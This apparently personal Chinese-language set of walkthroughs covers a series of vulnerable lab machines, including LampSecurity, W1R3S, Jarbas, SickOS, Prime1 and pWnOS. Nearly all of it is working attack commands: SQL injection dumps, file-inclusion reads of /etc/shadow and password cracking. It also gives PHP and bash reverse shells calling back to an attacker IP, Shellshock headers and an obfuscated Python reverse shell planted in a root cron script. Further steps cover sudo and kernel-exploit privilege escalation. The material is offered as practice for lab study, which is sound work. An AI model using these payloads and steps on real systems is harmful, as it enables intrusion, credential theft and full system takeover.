靶场攻击1

LampSecurityCTF4

扫描c段存活的主机,确认靶机的ip地址。
nmap -sn 192.168.15.0/24

通过扫描靶机的端口得知开放的端口。
nmap --min-rate 10000 -p- 192.168.15.55

使用nmap继续查看这些端口服务的版本信息以及操作系统的相关信息。
nmap -sT -sV -O -p22,25,80,631 192.168.15.55

接下来访问网站，游览完网站，发现page可能存在文件包含，但是却木有，然后感觉id可能存在sql注入，于是尝试加个',出现报错回显，则说明存在sql注入漏洞。
http://192.168.15.55/index.html?page=blog&title=Blog&id=2’

使用sqlmap对三个参数都进行sql注入测试，通过--dbs列出数据库的信息,--dump导出数据库的信息,--batch默认选择选项的默认值，这样不需要用户自己去做选择。
sqlmap -u 'http://192.168.15.55/index.html?page=blog&title=Blog&id=2' --dbs --dump --batch

并查看到了ehks数据库中的表中存在这些用户，以及md5碰撞出的密码。

根据ssh登录dstevens用户，发现缺少匹配的key exchange，一般出现这种问题，是靶机的ssh版本和kali机器的ssh版本信息不一致，配置信息不一致所导致的。
ssh [email protected]

接下来携带key exchange信息，在进行尝试登录,却发现主机密钥类型不匹配。
ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 [email protected]

进一步携带host key type信息，进行ssh登录尝试,于是登录成功。
ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 [email protected]

查看当前用户能使用的sudo命令列表，结果发现都可以执行。
sudo -l

那么就可以轻松提权咯
sudo /bin/bash

LAMPSecurityCTF5

首先探测C段存活主机
nmap -sn 192.168.15.0/24

根据靶机的ip扫描端口。
nmap --min-rate 10000 -p- 192.168.15.56

根据这些端口检测服务的版本和操作系统信息
nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,47333 192.168.15.56

扫描UDP端口信息，看是否有遗漏端口
nmap -sU --min-rate 10000 -p- 192.168.15.56

查找这些开放端口是否存在可利用漏洞。
nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,47333 192.168.15.56

访问网页发现是nano cms系统。

查看nanocms系统是否存在可利用漏洞，发现存在登录认证后的RCE远程代码执行漏洞。
searchsploit nanocms

通过搜寻nano exploit发现可能存在内容泄露的情况。

访问http://192.168.15.56/~andy/data/pagesdata.txt
于是访问这文件内部具有密码泄露的情况。

由于密码内部是个hash值，首先可以去判断这个密码hash的类型,发现可能存在的密码类型是MD5
hash-identifier '9d2f75377ac0ab991d40c91fd27e52fd'

首先将kali自带的密码本进行解压。
gunzip rockyou.txt.gz -k

使用hashcat工具把字典和md5密码进行碰撞。
hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt

于是根据账户admin,密码shannon，登录cms系统。

在cms系统中，根据网页进行编辑，插入php反弹shell代码。

填加以下反弹shell的内容
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.15.128/1234 0>&1'"); ?>

kali进行端口监听
nc -lvnp 1234

于是反弹shell连接成功。

接下来就是提权环节，首先查看所有该用户能访问的文件中，是否存在pass字段，其中访问不了的文件会报错，则把报错输出重定向到黑洞设备中。
于是发现有个文件内部竟然有root password的相关信息。
grep -R -i pass /home/* 2>/dev/null

查看这个文件，发现root密码50$cent
cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

得知密码后，切换root用户时发现需要tty标准，原因是反弹shell的交互性比较低，可以使用python提高交互性

使用python提高交互性。
python -c "import pty;pty.spawn('/bin/sh');"

于是再次切换root用户，提权成功。

W1R3S 1.0.1

扫描c段确定靶机的ip地址。
nmap -sn 192.168.15.0/24

以tcp三次握手的方式探测靶机的端口，并把探测出的端口输出到nmapscan目录下。
nmap -sT --min-rate 10000 -p- 192.168.15.57 -oA nmapscan/ports

当主机端口开放过多，可以使用命令把输出的文件过滤出open的端口
grep open nmapscan/ports.nmap

可以使用awk按照/进行分隔，并打印第一列的内容，即端口信息。
grep open nmapscan/ports.nmap|awk -F '/' '{print $1}'

如果觉得显示多行不习惯，可以显示成一行。
其中-s是输出一行,-d是设置分隔符。
grep open nmapscan/ports.nmap|awk -F '/' '{print $1}'|paste -sd ','

按照开放的端口进行服务版本的识别，以及操作系统信息的识别。
结果根据扫描发现ftp存在可以匿名登陆的情况，并且还列出ftp内部的三个目录。
nmap -sT -sC -sV -O -p21,22,80,3306 192.168.15.57 -oA nmapscan/detail

指定UDP方式扫描最常见的20个udp端口是否打开,扫描出多个udp可疑端口，并不确定是开放还是被防火墙拦截。
nmap -sU --top-ports 20 -oA nmapscan/udp 192.168.15.57

扫描这些开放端口是否有可利用漏洞，发现扫描不出什么可利用的漏洞。
nmap --script=vuln -p21,22,80,3306 192.168.15.57 -oA nmapscan/vuln

根据mysql和ftp和web和ssh，一般来说ftp可以先进行渗透测试，而ssh则需要放到优先级最后。
登录ftp服务。
ftp 192.168.15.57

为了保证ftp服务器中下载的文件能正常使用和运行，需要切换成binary模式，并且设置无交互模式，这样不会有提示信息。
binary
prompt

将三个目录下的所有文件都下载下来
mget *.txt //下载多个文件
get 1.txt //下载单一文件。

退出ftp服务器，并查看所有下载的txt文件。
发现有一个类似hash的字符串。还有一串具有base64加密特征的字符串，以及一些员工信息。
cat *.txt

先判断这个hash值是什么类型的,判断出大概率是md5。
hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce

这里尝试使用hashcat自带的密码本没有碰撞出来，在web上搜索md5 cracker碰撞出这个hash值的内容提示说不是密码。

在对另一串base64的内容进行解密，发现解密的内容也是无效信息。
echo "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=="|base64 -d

于是ftp渗透测试环节没有什么有效信息，于是可以尝试渗透mysql。
首先尝试登录mysql，却发现无法远程连接，于是放弃这条路
mysql -h 192.168.15.57 -u root -p

接下来找web端的漏洞，仅发现是一个网页，并没有什么有效信息，查看源码的注释信息也没有有用信息。

于是只能进行网站目录扫描。发现存在wordpress的cms系统。
gobuster dir -u http://192.168.15.57/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

却发现wordpress无法访问，于是放弃这条路线。

尝试访问另外两个目录，其中一个目录权限不够不给访问，另一个发现是一个安装界面，于是点击next

会发现这个是cuppa cms系统，我们随便设置号数据库名称，密码以及email尝试安装，思路是想通过管理界面注入反弹shell代码。

结果发现无法安装。于是想直接这样子走到cuppa cms的管理界面是不可能了。

紧接着探测这个cuppa cms有什么漏洞可以利用。
searchsploit cuppa cms

下载对应的脚本文件，看看怎么利用文件包含漏洞。
searchsploit cuppa -m 25971

查看文件内容，指示说明这个cms中的alertConfigField.php的一个参数存在文件包含漏洞。

发现访问时没有这个文件，根据之前扫描出的administrator目录，那么很可能是这个目录作为根目录。

http://192.168.15.57/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../etc/passwd
但是访问这个页面，确实进行响应了，但是没有数据显示出来。

通过github找到该cms开源的源码，得知该php文件内部实际上是通过post接受这个参数的数据，所以用get的请求才出现这样的无法回显出内容的情况。

利用文件包含漏洞，可以查看到所有的用户信息。
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.15.57/administrator/alerts/alertConfigField.php

于是可以使用curl --data-urlencode，表示发送的参数数据是post请求，并且经过url编码。
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.15.57/administrator/alerts/alertConfigField.php

将具有密码hash的用户全部保存到一个文件中。

接下来可以使用john直接暴力破解hash,john是专门用于破解/etc/shadow的密码hash
于是得知两个账户的密码。
john shadow.hash

于是使用ssh进行远程访问其中一个账户。
ssh [email protected]

查看是否sudo命令。
sudo -l

那么所有都可以sudo,那么随便提权成功了
sudo /bin/bash

其实这里还可以通过另外一个角度ssh密码爆破，来得知w1r3s的密码。
将需要爆破的用户名存放到一个user.txt文件中。

那么只需指定密码本即可进行ssh爆破。其中-t是指定爆破密码的线程数。
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.15.57 -t 4

JARBAS

首先扫描c段，确认靶机ip
nmap -sn 192.168.15.0/24

得知靶机ip后，对其进行端口的扫描
nmap --min-rate 10000 -p- 192.168.15.58

检测开放端口的服务版本信息，以及操作系统的信息
nmap -sT -sV -O -p22,80,3306 192.168.15.58

对靶机的UDP端口进行扫描
nmap -sU -p- 192.168.15.58

扫描开放端口是否有可利用漏洞,发现8080存在robots.txt文件
nmap --script=vuln -p22,80,8080,3306 192.168.15.58

查看这个文件的内容，发现没有什么有效信息。

访问80端口的web服务，点击里面的内容，没有发现什么有效利用的漏洞，于是只能尝试暴力扫描目录。

使用dirb扫描，并没有扫描出什么有效的目录。
dirb http://192.168.15.58/

于是换一个大型字典进行扫描，首先下载这个字典
sudo apt install seclists

然后继续进行目录爆破扫描,但是仍然没有扫描出内容。
gobuster dir -u http://192.168.15.58/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt

于是根据经验很可能是有些网页没有被扫描出来，于是加上后缀html、php并继续尝试扫描,于是扫描出一个新的网页access.html
gobuster dir -u http://192.168.15.58/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php

访问这个网页得到一些用户和密码hash值

于是网上搜索md5 cracker在线碰撞出hash的明文。

由于访问8080端口是jenkins的管理系统后台，于是根据得到的密码和用户尝试登录。由于尝试三个账号和对应的密码登录失败，于是只能尝试交叉登录。使用bp抓包，然后设置集束炸弹攻击类型。

设置好三个账号以及三个对应密码。

于是根据长度判断出正确账号应该是eder，密码是vipsu

于是即可登录成功。

而jenkins的利用漏洞流程很多，这里使用其中一个最为经典的，新建任务。

创建自由风格项目。

于是可以在项目中的构建处设置执行shell。

加入反弹shell命令。
/bin/bash -i >& /dev/tcp/192.168.15.128/4444 0>&1

kali机器进行监听,并且jenkins点击立即构建，那么就会触发里面的shell执行。
nc -lvnp 4444

获取到低权限用户的shell

想利用sudo -l提权，不知道jenkins的密码，于是无法查看能执行的sudo命令，于是放弃这个提权路线。

于是只能尝试查看定时计划，发现每隔5分钟有root用户执行某个脚本文件。
cat /etc/crontab

于是尝试在这个脚本内部写入反弹shell，那么以root执行当然就能提权成功咯
echo "/bin/bash -i >& /dev/tcp/192.168.15.128/4443 0>&1" >> /etc/script/CleaningScript.sh

kali监听等待提权的shell即可。
nc -lvnp 4443

SickOS1.1

扫描c段，确定靶机的ip地址。
nmap -sn 192.168.15.0/24

扫描靶机的端口，发现三个端口开放。
nmap -sT --min-rate 10000 -p- 192.168.15.59

检测三个开放端口的服务版本信息，以及操作系统信息
nmap -sT -sV -O -p22,3128,8080 192.168.15.59

在扫描靶机的UDP端口，以确保没有遗漏端口的扫描
nmap -sU -p- 192.168.15.59

扫描开放的端口是否有可利用漏洞,然而除了扫描出dos攻击，没有别的漏洞可利用。
nmap --script=vuln -p22,3128,8080 192.168.15.59

于是根据分析三个端口，ssh优先级最低，而8080端口是关闭的，那么只能围绕3128端口展开，并且这个端口使用的是squid代理服务。接下来先访问这个squid代理服务的界面，发现无有用信息，但是再次提示了squid代理服务。

按照常规方法，先对这个网站进行目录爆破扫描,然而什么都没发现。
dirb http://192.168.15.59:3128/

使用gobuster换成大目录字典，进行目录爆破扫描，但是也无法扫描目录成功。
gobuster dir -u http://192.168.15.59:3128/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt

根据squid代理的提示，我们可以尝试以squid作为代理去扫描站点是否有目录。
-p是指定代理
dirb http://192.168.15.59 -p http://192.168.15.59:3128/

于是win10配置好代理，就可以去访问这些web站点的url路径了，于是即可访问站点成功。

访问/connect，里面没有什么有效信息。

访问robots文件时，提示了wolfcms系统的站点路径，于是可以围绕这个cms进行展开渗透。

访问这个cms站点，游览了所有内容发现无有效信息提示。

但是一般cms系统肯定具有管理后台登录站点，但是不知道路径，所以去网页搜索这个cms的管理站点路径。
于是找到站点路径是/?/admin，访问就是这个界面了。

根据搜寻得知wolf cms的默认账号是admin,再根据弱口令爆破得知密码是admin，于是即可登录进去。然后对里面某个站点中添加php反弹shell代码即可。

添加php的反弹shell代码,然后保存即可。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.15.128/1234 0>&1'") ?>

kali进行端口监听,并且重新点击article，那么就会触发反弹shell代码的执行。
nc -lvnp 1234

由于sudo -l不知道该用户密码，并且定时计划任务无可提权的任务，那么只能查看是否有敏感文件。
于是在网页根目录站点发现了config.php文件，里面包含了mysql的root密码，即john@123
cat config.php

查看到系统有很多用户，于是不排除mysql的root密码可能能够登录到这些用户上，于是使用ssh依次尝试登陆

于是发现这个用户可以登录。
ssh [email protected]

查看可以执行的sudo命令是ALL，那么接下来就随便提权了
sudo -l

提权成功
sudo /bin/bash

SickOS1.1解法二

使用nikto配合squid代理扫描该靶机站点是否存在web漏洞。于是发现该站点存在shellshock漏洞。
nikto -h 192.168.15.59 -useproxy http://192.168.15.59:3128/

通过该命令判断是否有shellshock漏洞，由于回显的内容有id的用户信息，说明有shellshock漏洞
-v是详细输出，--proxy是指定代理,-H是指定主机头，里面携带了命令进行远程代码执行的验证。
curl -v --proxy http://192.168.15.59:3128 http://192.168.15.59/cgi-bin/status -H "Referer:() {  test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"

使用msf生成一个反弹shell的bash命令。
msfvenom -p cmd/unix/reverse_bash lhost=192.168.15.128 lport=1234 -f raw

于是即可把生成的反弹shell的bash命令复制进去，即可利用shellcode漏洞获得shell.
curl -v --proxy http://192.168.15.59:3128 http://192.168.15.59/cgi-bin/status -H "Referer:() {  test;};0<&77-;exec 77<>/dev/tcp/192.168.15.128/1234;sh <&77 >&77 2>&77"

如果kali监听一小会后断了，可以在msf生成payload处把sh内容补全为/bin/sh
curl -v --proxy http://192.168.15.59:3128 http://192.168.15.59/cgi-bin/status -H "Referer:() {  test;};0<&77-;exec 77<>/dev/tcp/192.168.15.128/1234;/bin/sh <&77 >&77 2>&77"

于是kali监听即可获得shell
nc -lvnp 1234

接下来就是提权环节，可以先查看内核版本信息以及这个靶机安装了什么东西
uname -a 
dpkg -l
然后发现里面有安装python,于是可以使用python提高shell的交互性
python -c "import pty;pty.spawn('/bin/bash')"

首先尝试查看是否能执行sudo命令,由于不知道该用户的密码，所以无法使用sudo进行提权。
sudo -l

接下来尝试查看计划任务，一定要把每个计划任务的配置文件都看一遍，看能否能进行提权的。

但是这个定时计划任务明显没有能够提权的。

于是查看其它的依次寻找，找到这个定时任务以root执行，并且每隔一分钟运行这个python脚本。

于是使用msf生成python的反弹shell.
msfvenom -p cmd/unix/reverse_python lhost=192.168.15.128 lport=2345 -f raw

将python的反弹shell代码添加进这个python文件中。
echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkFELgjAUhf+K7GmDmG1lGLEHCYOICtJ3ybVQsm149f/nMtNHL1y2nX33HLjl25q68cDIl2q8rhZdQ5vb2kgFMCjme3O18woDjUBsyynbhJQFlPEQjd/OT/DVOhglEL0/7Q/8e0WH7HiJ039qrybX/SlL0lscncnEgkqjtZINxi5/mHFhZIIZoI/Wcgz0WVZKG0wGcjmLYrMoPqGsGLdF5b2qMPLzUvtQIPIBYvdafA==')[0])))" >> /var/www/connect.py

kali进行监听，等待一分钟后，即可上线成功。

Prime1

扫描C段确定靶机ip地址。
nmap -sn 192.168.15.0/24

扫描靶机的端口
nmap --min-rate 10000 -p- 192.168.15.60

根据开放的端口检测对应的服务版本号以及操作系统信息。
nmap -sT -sV -O -p22,80 192.168.15.60

扫描靶机的UDP端口是否有开放
nmap -sU -p22,80 192.168.15.60

根据开放的端口扫描是否有可利用的漏洞
nmap --script=vuln -p22,80 192.168.15.60

接下来根据扫描的端口的优先级，那么肯定是优先对80端口进行渗透测试，访问这个网页无任何有效信息。

所以只能先对目录进行扫描,发现能够扫描出大量与wordpress相关的cms系统信息。
dirb http://192.168.15.60/

根据扫描的结果访问dev目录，里面提示说要深挖这个靶机的目录信息。

于是在此基础上加上后缀，深挖zip和txt等文件。于是深挖出了一个secret.txt文件。
dirb http://192.168.15.60/ -X .zip,.txt

访问这个txt文件，提示对每一个php文件进行fuzz操作来寻找参数信息,并且提示使用这个location.txt。

根据扫描的结果，该靶机具有两个php文件。
dirb http://192.168.15.60/ -X .php

先对image.php进行fuzz操作。
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.15.60/image.php?FUZZ=123
根据第一次fuzz的返回结果进行筛选过滤信息，结果为空。
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.15.60/image.php?FUZZ=123

那么就对另一个php文件进行fuzz操作，同理要做信息的过滤筛选。然后fuzz出一个参数是file.
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.15.60/index.php?FUZZ=123

根据这个file参数尝试文件包含漏洞，结果失败，提示挖掘的文件是错误的。
curl http://192.168.15.60/index.php?file=../../../../../../../../../etc/passwd

于是根据之前的提示包含location.txt文件。发现提示了一个新的参数secrettier360来使用其他的php文件。
curl http://192.168.15.60/index.php?file=location.txt

由于在image.php使用这个参数提示说找到正确的参数，于是可以尝试看看能不能进行文件包含漏洞。
curl http://192.168.15.60/image.php?secrettier360=../../../../../../etc/passwd

又提示说去查看这password.txt文件，说明里面可能存在密码。

结果确实存在一个密码(follow_the_ippsec)。
curl http://192.168.15.60/image.php?secrettier360=/home/saket/password.txt

由于使用该密码去ssh登录主机的用户发现都不能成功,于是还是只能围绕wordpress cms展开。
首先枚举出wordpress的账号有哪些,其中-e u是用于枚举用户
wpscan --url http://192.168.15.60/wordpress/ -e u

于是使用这个账号和密码可以登录到该cms的管理后台。

首先登录到wordpress管理后台，接下来就由很多方法得到shell了。
第一种使用plugins来上传插件，但是上传的文件只能是zip，首先尝试上传zip结果是失败的，所以这个渗透路线放弃。

第二种是在appearance中的theme editor可以试试能否更改里面的php文件，那么就可以携带php反弹shell代码。经过搜寻发现secret.php文件是可以编辑修改php代码的，于是在里面添加反弹shell代码。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.15.128/3456 0>&1'"); ?>

由于不知道这个文件php在哪个路径，于是扫描目录
-e at是用于扫描wordpress下的目录信息
wpscan --url http://192.168.15.60/wordpress/ -e at

于是访问该url即可触发执行反弹shell
http://192.168.15.60/wordpress/wp-content/themes/twentynineteen/secret.php

kali进行监听,当访问修改的php网页即可触发得到shell.
nc -lvnp 3456

接下来就是提权，首先使用sudo -l查看，发现有个命令能够执行，但是进一步查看发现这个文件权限不够，无法修改里面的内容，于是这个提权路线无法进行下去。

查看定时计划任务信息也发现无有效信息，那么只能考虑内核提权了。首先查看内核版本信息
uname -a

根据内核版本信息，去查找是否有提权漏洞,于是找到第二个是提权漏洞。
searchsploit Linux ubuntu 4.10.0

下载对应的c文件,然后查看这个c文件发现，只需gcc编译执行就能提权了。
searchsploit searchsploit Linux ubuntu 4.10.0 -m 45010
cat 45010.c

那么kali先开启http服务器，让靶机能够下载这个c文件
python3 -m http.server 8088

靶机下载这个漏洞提权文件，最好在tmp目录下下载，因为这个目录权限对普通用户友好。

编译执行，此时提权成功.
gcc 45010.c -o 45010
./45010

Prime1的另一种提取思路

首先获取到该靶机的shell后，查看是否有可执行的sudo命令,发现会以root身份执行enc文件。
sudo -l

由于enc文件与openssl的关联性比较大，可以首先尝试去执行enc文件，但是需要saket用户的密码，于是暂时无法执行。
由于是靶机，可能存在存储密码文件在靶机的情况，于是需要进行搜索，可以搜索backup关键字看是否能找到,自己过滤掉无用的backup相关的文件，于是找到两个怀疑对象。
find / -name *backup* 2>/dev/null|sort|less

分别查看这两个文件。其中/var/backups目录下的文件权限不足，无法查看，所以只能查看另一个目录。于是找到了执行enc文件的密码(backup_password)。

使用该密码进行ssh登录无法成功，但是执行enc文件使用该密码则可以，于是得到两个文件分别是enc.txt和key.txt
sudo ./enc

分析得知enc.txt肯定就是密文文件，key.txt就是密钥文件。其中查看key.txt提示使用ippsec转换成md5hash来作为密钥进行解密。

于是获得ippsec的md5hash值。
-n表示输入字符串时不自带\n换行,awk是为了标准化输出，因为直接md5sum生成的hash后面带有一些无用字符，可以使用awk分割把hash和无效字符拆分出来，并使用print打印出来(366a74cb3c959de17d61db30591c39d1)。
echo -n 'ippsec'|md5sum|awk -F ' ' '{print $1}'

首先根据查看enc.txt密文文件，可以发现这个加密的文件可能是经过base64编码的。

由于openssl支持的加解密算法过多，但却不知道这个密文使用什么加密算法，于是只能把所有的加密算法都保存到一个文件，便于后续使用for循环依次进行尝试。可以通过openssl  --help依次把所有的加密类型保存起来。

在将这些加密算法在指定保存文件中进行格式的修整
首先全局替换空格变成换行符，使用sort排序，把加密算法的相隔换行符去除，但是根据查看行数发现前面还是有过多的空格
awk '{gsub(/ /,"\n");print}' enc_type|sort|wc -l
去除前面多余空格，只保留一个空格,此时查看行数正常，说明没有多余空格了
awk '{gsub(/ /,"\n");print}' enc_type|sort|uniq|wc-l
将修整好的格式输出到指定文件即可。
awk '{gsub(/ /,"\n");print}' enc_type|sort |uniq >CipherType

查看输出的文件，此时加密算法类型都一行一行排整齐，便于后续进行for循环解密。

通过查看openssl enc的文档，发现指定密钥使用-K，并且密钥要保证是十六进制格式，也就是说md5 hash还要转换成十六进制的格式。
man openssl enc

对md5的hash进行十六进制转换。
echo -n 'ippsec'|md5sum|awk -F ' ' '{print $1}'|tr -d '\n'|od -A n -t x1|tr -d '\n'|tr -d ' '
其中td -d '\n'表示清除所有的换行符,od -A n表示不显示地址,-t x1指定输出格式为十六进制

于是将enc.txt的密文内容复制出来，然后配合for循环所有的解密算法进行解密即可。于是解密出内容，还得知是使用aes-256-ecb解密出来的，得知了saket用户的密码是tribute_to_ippsec
open enc中的-d是指解密，-a是指解密时先进行base64解码,-$Cipher根据for循环依次使用不同的加密算法解密,-K指定十六进制的密钥。由于解密的过程中肯定会产生很多错误数据，于是需要把标准错误输出重定向到黑洞，以便过滤出有效信息，并输出对应的解密算法，可以知道是通过哪个解密算法解密出数据。
for Cipher in $(cat CipherType);do echo  'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4='|openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null;echo $Cipher;done

于是使用ssh登录saket用户
ssh [email protected]

接下来就是使用saket用户的提取环节，首先查看到以root用户执行某个文件。

由于这个文件无法查看，于是尝试sudo执行这个脚本，结果发现提示challenge文件不存在。
sudo ./undefeated_victor

在challenge文件试着写入shell命令，生成新的shell，如果以root执行成功，则提权成功。
echo '#!/bin/bash' > challenge
echo '/bin/bash' >> challenge

于是重新执行提权成功。
sudo ./undefeated_victor

LAMPSecurityCTF7

注意该靶机启动必须点击移动虚拟机，点击复制虚拟机可能会出现nmap扫描不出的情况。

扫描C段确定靶机ip
nmap -sn 192.168.15.0/24

扫描靶机的端口
nmap --min-rate 10000 -p- 192.168.15.61

扫描靶机的UDP端口,发现并无开放UDP端口。
nmap -sU -p- 192.168.15.61

检测开放端口的服务版本号以及操作系统信息
nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.15.61

根据开放的端口检测是否有可利用漏洞
nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.15.61

根据开放端口优先级，先对80端口进行渗透，但并没有发现什么漏洞利用的地方。

那么只能对该站点进行目录扫描，于是扫描出很多的url路径。
dirb http://192.168.15.61/

接下来在对8080端口进行渗透，根据登录界面进行万能密码尝试，看是否存在sql注入。于是发现使用万能密码登录成功。
admin' or 1=1#

发现这个站点中点击add new可以进行文件上传，于是可以检测是否存在文件上传漏洞。

将shell.php上传进去，内容如下。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.15.128/1234 0>&1'");?>

在目录扫描的过程中，游览很多url路径，并无什么有效信息，其中游览assets目录，里面存在shell.php，就是之前上传的php文件。

那么kali此时建立监听
nc -lvnp 1234

接下来进去就是提权环节，首先先提高bash的交互性
python -c "import pty;pty.spawn('/bin/sh')"

然后查看可以执行的sudo命令,由于需要密码但是却不知道，所以暂时无法通过该方式进行提权。
sudo -l

那么接下来就先查看一些敏感文件，比如说网站根目录，是否存在数据库配置文件。于是进行查看
car db.php

于是发现mysql数据库竟然没有密码就可以登录。

然后登录mysql,在查看里面数据库的users表的数据。
mysql -uroot
select username,password from users;

将里面的用户名和密码复制到一个文件中，比如说这里存放到cred.lst文件中
提取其中的用户名信息，并放入到一个文件中。
cat cred.lst|awk -F ' ' '{print $2}'|awk -F '@' '{print $1}' > user.lst

提取里面的密码hash到一个文件中
cat cred.lst|awk -F ' ' '{print $4}' >hash.lst

紧接着需要判断这个hash是什么类型,根据检测说明大概率是MD5。
hash-identifier 'e22f07b17f98e0d9d364584ced0e3c18'

接下来使用hashcat对md5的内容进行碰撞
-m 0指定md5破解,-a 0指定使用字典破解
hashcat -m 0 -a 0 hash.lst /usr/share/wordlists/rockyou.txt

将密码复制下来，然后提取出明文密码。
cat passwordraw.lst|awk -F ':' '{print $2}' > pass.lst

根据保存的用户名和密码可以进行密码喷射攻击，即将每个密码都用给各个用户进行登录。
crackmapexec ssh 192.168.15.61 -p pass.lst -u user.lst --continue-on-success
根据第一次回显的结果，根据喷射成功的结果进行过滤。
crackmapexec ssh 192.168.15.61 -p pass.lst -u user.lst --continue-on-success|grep +

于是根据破解出来的账号和密码进行远程登录
由于第一次登录说缺少指定的主机密钥，于是使用-oHostKeyAlgorithms参数包含提示的密钥即可。
ssh [email protected] -oHostKeyAlgorithms=ssh-rsa,ssh-dss

接下来就是提权环节，发现sudo命令可以任意执行，那么就随便提权了。
sudo -l

于是提权成功
sudo /bin/bash

pWnOS2.0

由于该靶机是固定的ip,ip是10.10.10.100,所以需要把nat模式下的网段进行修改，才能进行实验。

首先扫描c段，确定靶机的IP是10.10.10.100
nmap -sn 10.10.10.0/24

对靶机的端口进行扫描，发现22和80端口开放
nmap --min-rate 10000 -p- 10.10.10.100

检测开放端口的版本信息以及操作系统信息
nmap -sT -sV -O -p22,80 10.10.10.100

扫描靶机是否有UDP端口。发现并无任何UDP端口开放
nmap -sU --min-rate 10000 -p- 10.10.10.100

扫描开放端口是否存在可利用漏洞
nmap --script=vuln -p22,80 10.10.10.100

由于80的优先级大于22，所以优先先对网页进行渗透测试，发现可以使用万能密码进行注入

但是注入进去,确实能够登录，但是登录进去的页面明显无作用。
这里也可以采用sqlmap去获取数据库的数据，但是这里不用该方式，而进行另一个路线的走法。
-u指定url,--data指定两个post请求的参数,--dbs输出数据库信息,--dump导出数据库信息,--batch实现自动化，不用做出选择
sqlmap -u "http://10.10.10.100/login.php" --data="[email protected]&pass=1234" --dbs --dump --batch

接下来对网站进行目录扫描
dirb http://10.10.10.100/

根据dirb扫描出来的路径，访问/blog的路径，发现里面页面类似一个cms系统。

查看源码搜寻cms名称的相关信息，配合大部分cms都会有的关键字powered,于是搜索到该cms的名称。

查找该cms存在的漏洞，发现有两个漏洞，随便使用其中一个。
searchsploit Simple PHP Blog 0.4.0

下载对应的漏洞脚本
searchsploit Simple PHP Blog 0.4.0 -m 1191

通过查看里面的脚本代码，里面具有使用说明

由于直接执行脚本会报错，根据网页搜寻，需要安装这个库才行
sudo apt-get install libswitch-perl
于是执行脚本，能够运行完成，那么就成功的在该cms创建了用户名和密码。
perl 1191.pl -h http://10.10.10.100/blog/ -e 3 -U hsw -P 123456

登录该cms系统

游览这个cms系统，发现里面存在文件上传，于是上传一个shell.php木马。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'");?>

kali建立好监听
nc -lvnp 1234
根据之前的dirb扫描，能够确认shell.php位置，于是进行访问

接下来就是提权环节，但是由于不知道该用户的密码，所以无法查看对应的sudo命令。而且查询定时计划任务，也无发现能够提权的操作。
但是由于cms一般都会有数据库信息，所以去网站根目录寻找数据库的配置信息，发现了其中里面的数据库管理员的密码
cat mysqli_connect.php

由于根据这个密码无法登录mysql,说明很有可能还有这个配置文件，只是说该配置文件没有被使用而已,于是经过查找确实是有两个数据库配置文件。
find / -name mysqli_connect.php 2>/dev/null

查看另一个数据库配置文件，得到数据库密码(root@ISIntS)

登录mysql,并查看对应的用户表信息，发现里面有一串密码hash(c2c4b4e51d9e23c02c15702c136c3e950ba9a4af)

检测这一段密码hash是属于什么类型的,于是检测是SHA-1
hash-identifier 'c2c4b4e51d9e23c02c15702c136c3e950ba9a4af'

通过web搜寻SHA-1 Cracker进行暴力破解，得到明文密码(killerbeesareflying)

但是根据这个密码进行尝试ssh登录都失败了，于是根据对运维人员的经验，他们可能会把数据库的密码作为自己的root密码那么只能这么进行尝试。于是使用密码(root@ISIntS)登录上去，顺利获得root权限。 
ssh [email protected]

pWnOS1.0

探测C段主机，确定靶机ip.
nmap -sn 10.10.10.0/24

对靶机进行端口扫描
nmap --min-rate 10000 -p- 10.10.10.129

对开放端口检测服务版本和操作系统
nmap -sT -sV -O -p22,80,139,445,10000 10.10.10.129

对靶机的UDP端口进行探测
nmap -sU --min-rate 10000 -p- 10.10.10.129

对开放端口进行可利用漏洞的检测
nmap --script=vuln -p22,80,139,445,10000 10.10.10.129

